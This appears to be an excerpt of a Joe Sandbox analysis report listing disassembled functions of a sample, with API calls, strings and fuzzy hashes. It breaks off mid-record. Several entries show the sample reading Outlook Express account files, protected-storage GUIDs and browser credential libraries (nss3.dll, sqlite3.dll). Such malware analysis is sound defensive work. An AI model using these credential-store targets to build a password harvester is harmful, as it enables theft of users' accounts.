                  Function 0040F41D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,76F90A60,?,00000000), ref: 0040F42B
                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: SHGetSpecialFolderPathA$shell32.dll
                  • API String ID: 2574300362-543337301
                  • Opcode ID: ebee045d17af5392e55c599677de8e54218ff7482c30a47864962e580415edd2
                  • Instruction ID: f6b0fe8b92f076911ecc5568a6e4330759afce426f86003319557fe493e3cfe8
                  • Opcode Fuzzy Hash: ebee045d17af5392e55c599677de8e54218ff7482c30a47864962e580415edd2
                  • Instruction Fuzzy Hash: 59D092B0642202ABD7208F21AC097827AAAE798706F01C53AA800E12A4FF7895448A5D
                  Function 004104AE Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@$memset
                  • String ID:
                  • API String ID: 1860491036-0
                  • Opcode ID: ed240992573ec86b58d2d50a2916693bc920e5de01bcfd4d726ef5af0379dd19
                  • Instruction ID: e5f264b8724d3d475e9e13978f0762699e8b6218914c988ba7d238899ccfa6da
                  • Opcode Fuzzy Hash: ed240992573ec86b58d2d50a2916693bc920e5de01bcfd4d726ef5af0379dd19
                  • Instruction Fuzzy Hash: 2431E8B0A007009FD750DF3A99856A6FBE5EF84305B25886FD25ACB262D7B8D481CF19
                  Function 0040BEEC Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: f09e4137cee235a1b9d7fd27eaadac0c52e283a178c2e8a252c289c30bf46ad1
                  • Instruction ID: 1bd4811e219587db2c743c544c50c2778389369fcaa1acc1f1d0acac3f9f4604
                  • Opcode Fuzzy Hash: f09e4137cee235a1b9d7fd27eaadac0c52e283a178c2e8a252c289c30bf46ad1
                  • Instruction Fuzzy Hash: D90128B1650B002BD235AB35CD03F6B77A4EB54B14F000B1EF642E66D3D7A8A14489AD
                  Function 0040242B Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004024EB
                  • memset.MSVCRT ref: 004024B4
                    • Part of subcall function 0040EFF9: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F016
                    • Part of subcall function 0040EFF9: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040F037
                    • Part of subcall function 0040EFF9: memcpy.MSVCRT ref: 0040F075
                    • Part of subcall function 0040EFF9: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040F084
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025A3
                  • LocalFree.KERNEL32(?), ref: 004025AD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                  • String ID:
                  • API String ID: 3503910906-0
                  • Opcode ID: 311549387020673e673ad7ade458deddd79687b60b573298398fe302b42a0f0d
                  • Instruction ID: cfc3eb1076764f39a441947bf0103a86c194fcc0ae6958193510771120a15821
                  • Opcode Fuzzy Hash: 311549387020673e673ad7ade458deddd79687b60b573298398fe302b42a0f0d
                  • Instruction Fuzzy Hash: 0341A3B1408385BFDB11DE608D44AAB7BDCAB88304F044A7EF588A21C1D679DA44CB5A
                  Function 0040A283 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00408A97: ??2@YAPAXI@Z.MSVCRT ref: 00408AB8
                    • Part of subcall function 00408A97: ??3@YAXPAX@Z.MSVCRT ref: 00408B7F
                  • strlen.MSVCRT ref: 0040A2A9
                  • atoi.MSVCRT ref: 0040A2B7
                  • _mbsicmp.MSVCRT ref: 0040A30A
                  • _mbsicmp.MSVCRT ref: 0040A31D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: _mbsicmp$??2@??3@atoistrlen
                  • String ID:
                  • API String ID: 4107816708-0
                  • Opcode ID: fcbe6108af864edb97e3be4016439bdb3d8805d59c5b364e212079bc31d54683
                  • Instruction ID: a4071902e71568577f89ec7532499d814672e4af5b69a40392892895b6c6556c
                  • Opcode Fuzzy Hash: fcbe6108af864edb97e3be4016439bdb3d8805d59c5b364e212079bc31d54683
                  • Instruction Fuzzy Hash: 2F414C35900304ABCB11DFA9C580A9ABBF4FB48308F1085BEEC45EB382D775DA51CB59
                  Function 0040933E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 110stringCOMMON
                  Download Yara Rule
                  APIs
                  • strchr.MSVCRT ref: 00409380
                  • strchr.MSVCRT ref: 0040938E
                    • Part of subcall function 00406C0E: strlen.MSVCRT ref: 00406C2A
                    • Part of subcall function 00406C0E: memcpy.MSVCRT ref: 00406C47
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strchr$memcpystrlen
                  • String ID: "$O4A
                  • API String ID: 647414859-2470771484
                  • Opcode ID: 9589ded8c9737ad3f073cf670c5b07d51d805ffd3e6e170b8e9921023cefc6bc
                  • Instruction ID: 2a898d4ed32f5f6efaaf06cea6bb2d3476af0f116e7825a2212580dac0848608
                  • Opcode Fuzzy Hash: 9589ded8c9737ad3f073cf670c5b07d51d805ffd3e6e170b8e9921023cefc6bc
                  • Instruction Fuzzy Hash: 27316431908204AFDF14EF65D8419DEBBB8EF59328B20416BEC51F71D2D778AA428E58
                  Function 00411533 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strlen
                  • String ID: >$>$>
                  • API String ID: 39653677-3911187716
                  • Opcode ID: 7edb754ddf4429fd3ce2b30709e1edacb08f523e3e7d14c7b467b5b93d7c181c
                  • Instruction ID: 10e230c6dca09e0a93cf8d60ed085072b0d540c64d6ff1ff1f1df815401d523a
                  • Opcode Fuzzy Hash: 7edb754ddf4429fd3ce2b30709e1edacb08f523e3e7d14c7b467b5b93d7c181c
                  • Instruction Fuzzy Hash: 6331E4718492C5AFCB118B6C80417EEFFA24F62304F08869AC2D546353C26DA5CAC39A
                  Function 0040BE4E Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpy
                  • String ID: @
                  • API String ID: 3510742995-2766056989
                  • Opcode ID: 49a5a345e8207f48ba7b20f9c3d546e09529423d2927eee968959314de42fdf5
                  • Instruction ID: eb902c52722b89a171555a0eccdb346c2cc9b7794a0320b873d5afd3574b0f46
                  • Opcode Fuzzy Hash: 49a5a345e8207f48ba7b20f9c3d546e09529423d2927eee968959314de42fdf5
                  • Instruction Fuzzy Hash: 201138B29007096BCB288E25C8809EB77A9EF54344700063FFE0696691E7759E95C7DC
                  Function 004070D9 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID:
                  • API String ID: 1865533344-0
                  • Opcode ID: 85edfb7e8b992a0ff1249ff66e53eb09c48dce348a16b7b1dc77ea68a0c6e46b
                  • Instruction ID: 17b98b22fb48c4f462205fa6a58e9a56533f9d3233289d57114c66ebe089a08a
                  • Opcode Fuzzy Hash: 85edfb7e8b992a0ff1249ff66e53eb09c48dce348a16b7b1dc77ea68a0c6e46b
                  • Instruction Fuzzy Hash: A6113D716046019FD328DF2DC981A27F7E6FF98304B20892EE59AC7385DA75E841CB55
                  Function 00406CFF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00411C87,?,00000000,00411C55,00000000,?,0040D972), ref: 00406D1E
                    • Part of subcall function 00406B54: free.MSVCRT(76F90A60,00000000,76F90A60,00406EF2,00000000,?,?), ref: 00406B63
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000000), ref: 00406D5C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$free
                  • String ID: O4A$O4A
                  • API String ID: 1329815435-993042121
                  • Opcode ID: 1ed867b22c69faf8c5b3106cc14bc2b24ab2cc1111c25bf338c9f6b2849c2373
                  • Instruction ID: 1b09f40ed87e73aeb79b4c84c04f27446391d6c1afa5035e0ae74dd7795ddf2a
                  • Opcode Fuzzy Hash: 1ed867b22c69faf8c5b3106cc14bc2b24ab2cc1111c25bf338c9f6b2849c2373
                  • Instruction Fuzzy Hash: 09115EB1B0011A6FDB01EFA9CD80ABF76FCEB08718B114137B915F7291E6749E148BA5
                  Function 0040F61F Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                  Download Yara Rule
                  APIs
                  • SHGetMalloc.SHELL32(?), ref: 0040F62F
                  • SHBrowseForFolderA.SHELL32(?), ref: 0040F661
                  • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F675
                  • strcpy.MSVCRT(?,?), ref: 0040F688
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: BrowseFolderFromListMallocPathstrcpy
                  • String ID:
                  • API String ID: 409945605-0
                  • Opcode ID: 46f915da22a8394e3ccfb75a6a67a5d073b6093023bbcacd313ffdd2da9d0fc7
                  • Instruction ID: b2d480601b656eadb7f9024a04999e6b50b11c93cc119ce3783244db306e4add
                  • Opcode Fuzzy Hash: 46f915da22a8394e3ccfb75a6a67a5d073b6093023bbcacd313ffdd2da9d0fc7
                  • Instruction Fuzzy Hash: 5811F7B5900208AFCB10DFA9D9889EEBBF8FB49315F10447AE905E7250D739DA46CF64
                  Function 00411C05 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D064,00000000,0040D972,?,?,00000104,00000000,?,0040D972,?,00000000), ref: 00411C1E
                  • ??2@YAPAXI@Z.MSVCRT ref: 00411C2A
                    • Part of subcall function 00406725: ReadFile.KERNEL32(?,0041141B,?,00000000,00000000,?,?,004112BE,0041141B,00000000,-00000002,?,0041133F,?,?,*.oeaccount), ref: 0040673C
                  • CloseHandle.KERNEL32(0040D972,00000000,?,0040D972,?,00000000,?,?,?,?,?,?), ref: 00411C58
                  • ??3@YAXPAX@Z.MSVCRT ref: 00411C63
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$??2@??3@CloseCreateHandleReadSize
                  • String ID:
                  • API String ID: 1968906679-0
                  • Opcode ID: 81dc463ec2356049af3ece681b76481b2013d83dc9d852187db2e126e8957335
                  • Instruction ID: 7eee50cd159b1862f9f77aaf36d5f43b0d65e01e2e9cd2c6863135ac6fea6ec1
                  • Opcode Fuzzy Hash: 81dc463ec2356049af3ece681b76481b2013d83dc9d852187db2e126e8957335
                  • Instruction Fuzzy Hash: 7801A231004104AAD711AF35DC09FDB3FA99F46374F15C12AF5188B2A1EB7A8650C7A9
                  Function 0040A5A1 Relevance: 6.0, APIs: 4, Instructions: 45stringwindowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00407A69: LoadStringA.USER32(00000000,0000000D,00000FFF,?), ref: 00407B32
                    • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                  • sprintf.MSVCRT ref: 0040A5C7
                  • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A62A
                    • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76F90A60), ref: 00407AE4
                    • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                  • sprintf.MSVCRT ref: 0040A5F1
                  • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A604
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                  • String ID:
                  • API String ID: 919693953-0
                  • Opcode ID: 958ab865ac69a3c4c3d9128656c309624dbea8e97793038db77fe03c7bb4008b
                  • Instruction ID: 49acf1ec04927684f0e14b468f671fa247d4e43980f6f5764d7eadf86f6a0ac4
                  • Opcode Fuzzy Hash: 958ab865ac69a3c4c3d9128656c309624dbea8e97793038db77fe03c7bb4008b
                  • Instruction Fuzzy Hash: 8A01DBB190030467D720F7B4CD86FDB73ACAB04304F04046FB755F61C2DAB9E6948A69
                  Function 0040FA2B Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040FA4D
                  • strlen.MSVCRT ref: 0040FA55
                  • strlen.MSVCRT ref: 0040FA62
                    • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                    • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strlen$memsetstrcatstrcpy
                  • String ID: sqlite3.dll
                  • API String ID: 1581230619-1155512374
                  • Opcode ID: 16108ddf4f13ffc1d1035336796fcbbad104ce4c6981e8ccb6bc320039be4e03
                  • Instruction ID: 4f80a8773c1d4988f6668b9143c1107d12609c3bb00905d80200812c675c4c4f
                  • Opcode Fuzzy Hash: 16108ddf4f13ffc1d1035336796fcbbad104ce4c6981e8ccb6bc320039be4e03
                  • Instruction Fuzzy Hash: F6F0427250C1186EDB20E769DC45FC977AC8F60318F1000B7F589E60C2DAF8D6C58668
                  Function 00409A67 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00409A8A
                  • memset.MSVCRT ref: 00409AA0
                    • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                    • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                  • sprintf.MSVCRT ref: 00409ACA
                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76F90A60,00000000,?,?,00409460,00000001,00413B1C,76F90A60), ref: 00405F21
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                  • String ID: </%s>
                  • API String ID: 3202206310-259020660
                  • Opcode ID: 637a9c7a3fbe891b17e74324215966cd4ae9ffaeb73701361f90968b62e1fe90
                  • Instruction ID: 3d0bab8d804eeed29aac85efced1b4409724b73b0f4afa6070eee5aab36d753a
                  • Opcode Fuzzy Hash: 637a9c7a3fbe891b17e74324215966cd4ae9ffaeb73701361f90968b62e1fe90
                  • Instruction Fuzzy Hash: A801F9729001296BD720A259CC45FDB7B6C9F54304F0400FAB60DF3142D6B49A94CBA5
                  Function 004123F2 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: bbf8de8405f53124a46ce5bf03d70c3b21be83380051b215e87da0a01535b9bd
                  • Instruction ID: d787685a6615fa8e7b12f25043f2ee1a52758ce9b2ab1ab1a3353857822e9c29
                  • Opcode Fuzzy Hash: bbf8de8405f53124a46ce5bf03d70c3b21be83380051b215e87da0a01535b9bd
                  • Instruction Fuzzy Hash: 8FE012703003206A8E30EB7ABF41AC327CDAA18351394C02EF609D2282DEA8DCE0C42C
                  Function 004021E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: _ultoasprintf
                  • String ID: %s %s %s
                  • API String ID: 432394123-3850900253
                  • Opcode ID: ad10a0a60f11ae5ad813c548426d3cbfbdd2c873bbe0414cf6ac4599a9575019
                  • Instruction ID: 4550bc8a79151648f87db51bd02682248f93ba3dc48fc4e36bbc9480066499b4
                  • Opcode Fuzzy Hash: ad10a0a60f11ae5ad813c548426d3cbfbdd2c873bbe0414cf6ac4599a9575019
                  • Instruction Fuzzy Hash: F741F731904B16C7CA34956487CCBEBA298E702304F6504BFDC5AF72D0D2FCAE46866B
                  Function 0040851B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageA.USER32(?,0000101A,00000000,?), ref: 00408597
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessageSend
                  • String ID: "$\LA
                  • API String ID: 3850602802-1791104459
                  • Opcode ID: 6730269ec323a4575099126faff27654677e2dead0fd5bf6d10708e601ad3506
